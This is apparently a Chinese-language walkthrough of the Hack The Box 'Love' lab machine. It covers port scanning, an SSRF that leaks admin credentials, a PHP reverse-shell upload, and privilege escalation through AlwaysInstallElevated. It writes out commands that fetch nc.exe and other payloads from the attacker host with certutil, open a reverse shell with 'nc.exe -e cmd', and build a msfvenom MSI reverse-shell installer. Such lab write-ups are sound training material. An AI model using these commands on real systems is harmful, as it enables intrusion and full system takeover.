1 扫描
迅速扫全端口,顺便浏览器打开靶机ip看看界面。写着是voting system投票界面
masscan -p1-65535,U:1-65535 10.10.10.239 --rate=1000 -e tun0
看到开了很多
masscan -p1-65535,U:1-65535 10.10.10.239 --rate=1000 -e tun0
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-08-07 02:24:45 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.239
Discovered open port 49667/tcp on 10.10.10.239
Discovered open port 5986/tcp on 10.10.10.239
Discovered open port 5040/tcp on 10.10.10.239
Discovered open port 49666/tcp on 10.10.10.239
Discovered open port 47001/tcp on 10.10.10.239
Discovered open port 139/tcp on 10.10.10.239
Discovered open port 80/tcp on 10.10.10.239
Discovered open port 3306/tcp on 10.10.10.239
Discovered open port 135/tcp on 10.10.10.239
Discovered open port 443/tcp on 10.10.10.239
Discovered open port 49668/tcp on 10.10.10.239
Discovered open port 49669/tcp on 10.10.10.239
Discovered open port 7680/tcp on 10.10.10.239
Discovered open port 49664/tcp on 10.10.10.239
Discovered open port 49665/tcp on 10.10.10.239
Discovered open port 49670/tcp on 10.10.10.239
Discovered open port 5985/tcp on 10.10.10.239
Discovered open port 5000/tcp on 10.10.10.239
拿nmap详细扫这些做多了靶机就知道的重要端口
nmap -A 10.10.10.239 -p 445,5986,139,80,3306,443,5000,5985
443这里看到staging.love.htb
新地址
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
把它10.10.10.239 staging.love.htb
加到你本机的/etc/hosts
里再访问staging.love.htb
2 信息搜集
在刚刚进入的网站里看看。 demo有示范、样片的意思。点进去发现可以输入网址扫文件,这里可以输靶机ip地址或127.0.0.1内网多试试。发现voting system这个界面。 这个跟之前在浏览器的网站输入框直接输10.10.10.239是一样的
之前扫的端口还有很多,一个个试稀奇古怪的端口,试127.0.0.1:5000
可以看到密码admin: @LoveIsInTheAir!!!!
有了密码就要找登录框,按经验一般在/admin
之类.拿dirbuster等各种目录扫描工具扫10.10.10.239.还真的找到
http://10.10.10.239/admin/
顺利进入。
找到上传php处
3 上传
在voters那里找到上传
上传著名的reverse-shell php
成功后看到图片那里没有显示,
根据经验,往往这里就是运行php处。再想是否哪里有点击图片的,放图片的目录
在目录扫描工具可见images
点到images目录
就可以看见上传的php了,点击。
本机接收,但是错误
提示uname 这个命令错误,这是linux命令,那么意思是靶机系统为win,不是linux
再换win的reverse shell php
网上有很多
我习惯用网页交互在线版这个工具
成功。
然后一套流程弹回本机,使后面操作更方便。
传nc (本机要准备好,这些步骤过去讲了太多就省略了)
certutil -urlcache -split -f http://10.10.14.2/nc.exe nc.exe
弹回,收到,拿下。
nc.exe -e cmd 10.10.14.2 1234
4 提权
传win版的winpeas进去扫https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
certutil -urlcache -split -f http://10.10.14.2/winPEAS.exe 666.exe
直接运行
发现
在这里有英文漏洞描述
简单说就是对这种AlwaysInstallElevated
让没权限的可以 以最高system权限运行,因此在这里可做手脚
照着来
先生成邪恶文件msfvenom -p windows/x64/shell_reverse_tcp Lhost=10.10.14.2 LPORT=4444 -f msi > shell.msi
传入certutil -urlcache -split -f http://10.10.14.2/shell.msi shell.msi
运行msiexec /quiet /qn /i shell.msi
本机开端口,接收,拿下